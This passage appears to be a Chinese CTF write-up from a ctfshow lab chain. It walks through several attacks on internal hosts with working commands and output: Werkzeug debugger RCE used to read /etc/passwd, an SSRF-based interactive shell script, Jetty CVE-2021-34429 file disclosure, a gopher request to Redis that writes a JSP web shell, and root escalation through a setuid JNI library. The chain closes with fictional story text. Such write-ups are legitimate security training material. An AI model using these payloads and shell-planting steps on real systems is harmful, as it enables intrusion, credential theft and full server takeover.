http://172.2.237.5/cmd.php?0=curl -c 1.txt -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4"  "http://172.2.237.6:8888/console%3f__debugger__=yes%2526cmd=pinauth%2526pin=834-059-141%2526s=motSXRASEKviSbHLumrO"

访问1.txt拿到cookie:

1	__wzd1bb8000fe86a8d35ba90=1740747901\|f92113889b49

利用cookie去进行RCE，这里直接读：

http://172.2.237.5/cmd.php?0=curl  -v -b  "__wzd1bb8000fe86a8d35ba90=1740747901|f92113889b49"  "http://172.2.237.6:8888/console?__debugger__=yes&cmd=print(__import__('os').popen('cat%20\/etc\/passwd').read())&frm=0&s=motSXRASEKviSbHLumrO"

这里不知道为什么执行不了，我就将cmd.php里的system改成eval了

重新进行rce:

1
2
3

http://172.2.237.5/cmd.php?0=system(base64_decode('Y3VybCAgLXYgLWIgICJfX3d6ZDFiYjgwMDBmZTg2YThkMzViYTkwPTE3NDA3NDc5MDF8ZjkyMTEzODg5YjQ5IiAgImh0dHA6Ly8xNzIuMi4yMzcuNjo4ODg4L2NvbnNvbGU/X19kZWJ1Z2dlcl9fPXllcyZjbWQ9cHJpbnQoX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0JTIwXC9ldGNcL3Bhc3N3ZCcpLnJlYWQoKSkmZnJtPTAmcz1tb3RTWFJBU0VLdmlTYkhMdW1yTyI='));

//curl  -v -b  "__wzd1bb8000fe86a8d35ba90=1740747901|f92113889b49"  "http://172.2.237.6:8888/console?__debugger__=yes&cmd=print(__import__('os').popen('cat%20\/etc\/passwd').read())&frm=0&s=motSXRASEKviSbHLumrO"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ctfer:x:1000:1000::/home/ctfer:/bin/bash

也可以进行外带注入：

1
2
3

http://172.2.237.5/cmd.php?0=system(base64_decode('Y3VybCAgLXYgLWIgICJfX3d6ZDFiYjgwMDBmZTg2YThkMzViYTkwPTE3NDA3NDc5MDF8ZjkyMTEzODg5YjQ5IiAgImh0dHA6Ly8xNzIuMi4yMzcuNjo4ODg4L2NvbnNvbGU/X19kZWJ1Z2dlcl9fPXllcyZjbWQ9X19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0JTIwXC9ldGNcL3Bhc3N3ZD4uXC9sb2dcL21haW4ubG9nJykmZnJtPTAmcz1tb3RTWFJBU0VLdmlTYkhMdW1yTyI='));

//curl  -v -b  "__wzd1bb8000fe86a8d35ba90=1740747901|f92113889b49"  "http://172.2.237.6:8888/console?__debugger__=yes&cmd=__import__('os').popen('cat%20\/etc\/passwd>.\/log\/main.log')&frm=0&s=motSXRASEKviSbHLumrO"

再访问main.log即可：

1
2
3

http://172.2.237.5/cmd.php?0=system(base64_decode('Y3VybCAtdiAtYiAic2Vzc2lvbj1leUoxYzJWeUlqb2lZV1J0YVc0aWZRLlo4R1pQdy5vZ2hpOUJ4NXRZMl85d2l6MDJlSjlSVWR4UDQiICAiaHR0cDovLzE3Mi4yLjIzNy42Ojg4ODgvZ2V0X2xvZ19jb250ZW50P2xvZ0ZpbGU9bWFpbi5sb2ci'));

//curl -v -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4"  "http://172.2.237.6:8888/get_log_content?logFile=main.log"

也可以用大佬写的interactive shell脚本，内容根据情况修改：

import base64
import requests
import urllib.parse

while True:
    data = input("> ")
    # data = urllib.parse.quote(data)
    # python_shell = 'curl --cookie "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z3kddg.CjbNhdNFa_7H--igibxBzM2omNk;__wzd2fb5743f98b45463400e=1736152460|4bfc86e353c8" "http://172.2.252.6:8888/console?__debugger__=yes&s=eABh7cMeNgMKri1DSi4w&cmd={}&frm=1"'.format(data)
    # python_shell = base64.b64encode(python_shell.encode()).decode()
    data = base64.b64encode(data.encode()).decode()
    # normal_shell = 'echo "' + data + '" | base64 -d | sh'
    normal_shell=data
    # url = "https://543f943e-6f90-43b4-bfc8-ee86d2fb3f34.challenge.ctf.show/downloadTaskFile?url=http://172.2.239.5/1.php?1=phpinfo();"
    url = "http://9c30a725-a36d-4e54-874b-f088dc3d80cf.challenge.ctf.show/downloadTaskFile?url=http://172.2.233.5/1.php?1=system(base64_decode(\""+normal_shell+"\"));"
    response = requests.get(url, verify=False, headers={'Authorization': "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJkeWxhbiIsImV4cCI6MTgzNjIzMjMxN30.nB-6uWH-wBxU3e_QJLw1O_TaPARU5o2DUe-y1TvqX5w"})
    try:
        # print(url)
        # print(response.json())
        # print(response.json()["url"])
        print(response.json()["file_content"])
    except:
        print("Error")
        continue

flag10：ctfshow{ctfer:x:1000:1000::/home/ctfer:/bin/bash}

第五章

艰难的最后一步

需要提交redis的密码

这里继续横向渗透，发现7的8080端口存在jetty服务，Eclipse Jetty是一个Java Web 服务器和Java Servlet容器。

看了下服务器版本为Jetty(9.4.40.v20210413)，直接搜：jetty常用渗透总结

发现存在信息泄露，CVE-2021-34429直接打

1	http://172.2.139.7:8080/.%00/WEB-INF/web.xml

port为6380

flag11：ctfshow{ctfshow_2025}

功亏一篑

需要提交 /dylan.txt 中的key

/dylan.txt在根目录里，而前面我们拿到了redis密码，这里自然要登陆redis

登录redis：

1
2
3

http://172.2.139.5/cmd.php?0=system(base64_decode('Y3VybCAgLXYgICJkaWN0Oi8vMTcyLjIuMTM5Ljc6NjM4MC9hdXRoOmN0ZnNob3dfMjAyNSI='));

//curl  -v  "dict://172.2.139.7:6380/auth:ctfshow_2025"

构造gopher请求写jsp马：

auth ctfshow_2025
set mars "<% Runtime.getRuntime().exec(new String[]{\"sh\",\"-c\",request.getParameter(\"cmd\")});%>"
config set dir /opt/jetty/webapps/ROOT/
config set dbfilename 2.jsp
save
quit

url编码：

gopher://172.2.139.7:6380/_auth%20ctfshow_2025%0Aset%20mars%20%22%3C%25%20Runtime.getRuntime().exec(new%20String%5B%5D%7B%5C%22sh%5C%22%2C%5C%22-c%5C%22%2Crequest.getParameter(%5C%22cmd%5C%22)%7D)%3B%25%3E%22%0Aconfig%20set%20dir%20%2Fopt%2Fjetty%2Fwebapps%2FROOT%2F%0Aconfig%20set%20dbfilename%202.jsp%0Asave%0Aquit

1
2
3

http://172.2.139.5/cmd.php?0=system(base64_decode('Y3VybCAgLXYgICJnb3BoZXI6Ly8xNzIuMi4xMzkuNzo2MzgwL19hdXRoJTIwY3Rmc2hvd18yMDI1JTBBc2V0JTIwbWFycyUyMCUyMiUzQyUyNSUyMFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3JTIwU3RyaW5nJTVCJTVEJTdCJTVDJTIyc2glNUMlMjIlMkMlNUMlMjItYyU1QyUyMiUyQ3JlcXVlc3QuZ2V0UGFyYW1ldGVyKCU1QyUyMmNtZCU1QyUyMiklN0QpJTNCJTI1JTNFJTIyJTBBY29uZmlnJTIwc2V0JTIwZGlyJTIwJTJGb3B0JTJGamV0dHklMkZ3ZWJhcHBzJTJGUk9PVCUyRiUwQWNvbmZpZyUyMHNldCUyMGRiZmlsZW5hbWUlMjAyLmpzcCUwQXNhdmUlMEFxdWl0Ig=='));

//curl  -v  "gopher://172.2.139.7:6380/_auth%20ctfshow_2025%0Aset%20mars%20%22%3C%25%20Runtime.getRuntime().exec(new%20String%5B%5D%7B%5C%22sh%5C%22%2C%5C%22-c%5C%22%2Crequest.getParameter(%5C%22cmd%5C%22)%7D)%3B%25%3E%22%0Aconfig%20set%20dir%20%2Fopt%2Fjetty%2Fwebapps%2FROOT%2F%0Aconfig%20set%20dbfilename%202.jsp%0Asave%0Aquit"

由于没有回显，所以需要带到其他文件：

1	http://172.2.139.7:8080/2.jsp?cmd=ls%20/>/opt/jetty/webapps/ROOT/1.txt

1	http://172.2.139.7:8080/1.txt

1	http://172.2.139.7:8080/2.jsp?cmd=cat%20/dylan.txt>/opt/jetty/webapps/ROOT/1.txt

flag12：ctfshow{7b11a7ae330883cb5bf667a9c1604635}

今日方知我是我

需要提交/root/message.txt中提到的网址

需要提权

查suid:

1	find / -user root -perm -4000 -print 2>/dev/null

没有可以利用的

查cap权限：

1	http://172.2.139.7:8080/2.jsp?cmd=getcap%20-r%20/%202>/dev/null>/opt/jetty/webapps/ROOT/1.txt

发现java有setuid权限

不会Java提权，只能参考官方wp的做法：

写入SetUID.c：

#include <jni.h>
#include <unistd.h>

JNIEXPORT jint JNICALL Java_SetUID_setUID(JNIEnv *env, jobject obj, jint uid) {
    return setuid(uid);
}

http://172.2.139.7:8080/2.jsp?cmd=echo%20"I2luY2x1ZGUgPGpuaS5oPgovLzExMTExMTExMTExMjIKI2luY2x1ZGUgPHVuaXN0ZC5oPgoKSk5JRVhQT1JUIGppbnQgSk5JQ0FMTCBKYXZhX1NldFVJRF9zZXRVSUQoSk5JRW52ICplbnYsIGpvYmplY3Qgb2JqLCBqaW50IHVpZCkgewogICAgcmV0dXJuIHNldHVpZCh1aWQpOwp9"%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.c

写入SetUID.java:

public class SetUID {
    static {
        System.loadLibrary("SetUID"); 
    }

    public native int setUID(int uid); 

    public static void main(String[] args) throws Exception {
        SetUID setUID = new SetUID();
        int result = setUID.setUID(0); 
        Runtime.getRuntime.exec(new String[]{"sh","-c","cat /root/*.txt>/opt/jetty/webapps/ROOT/root.txt"});
    }
}

http://172.2.139.7:8080/2.jsp?cmd=echo%20"cHVibGljIGNsYXNzIFNldFVJRCB7CiAgICBzdGF0aWMgewogICAgICAgIFN5c3RlbS5sb2FkTGlicmFyeSgiU2V0VUlEIik7IAogICAgfQoKICAgIHB1YmxpYyBuYXRpdmUgaW50IHNldFVJRChpbnQgdWlkKTsgCiAgLy9hCiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTZXRVSUQgc2V0VUlEID0gbmV3IFNldFVJRCgpOwogICAgICAgIGludCByZXN1bHQgPSBzZXRVSUQuc2V0VUlEKDApOyAKICAgICAgICBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKG5ldyBTdHJpbmdbXXsic2giLCItYyIsImNhdCAvcm9vdC8qLnR4dD4vb3B0L2pldHR5L3dlYmFwcHMvUk9PVC9yb290LnR4dCJ9KTsKICAgIH0KfQ=="%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.java

编译SetUID.c:

1	http://172.2.139.7:8080/2.jsp?cmd=gcc%20-shared%20-fPIC%20-o%20/opt/jetty/webapps/ROOT/libSetUID.so%20-I${JAVA_HOME}/include%20-I${JAVA_HOME}/include/linux%20/opt/jetty/webapps/ROOT/SetUID.c

编译SetUID.java：

1	http://172.2.139.7:8080/2.jsp?cmd=javac%20/opt/jetty/webapps/ROOT/SetUID.java

root执行命令:

1	http://172.2.139.7:8080/2.jsp?cmd=java%20-Djava.library.path=/opt/jetty/webapps/ROOT/%20-cp%20/opt/jetty/webapps/ROOT/%20SetUID

致信后来者：

同志你好！我是81192，我不是第一批81192，也不会是最后一批81192，81192从来不是一个人。
现在，同志，你也是81192的一员了。

我已经清理和收集了他们的所有资料并传回总部，但是在我离开的时候，被dylan投毒，我已经感染了他们的朊病毒。
我把我的最后的话，都放到了一个网址里面，你在他们的任务中心中，用dylan身份登陆后，在管理菜单中 访问下面地址，就能看到了！再见了，同志！
网址是：http://8.11.9.2

现在我命令你：
我已无法返航，请继续前进！请继续前进！

（完）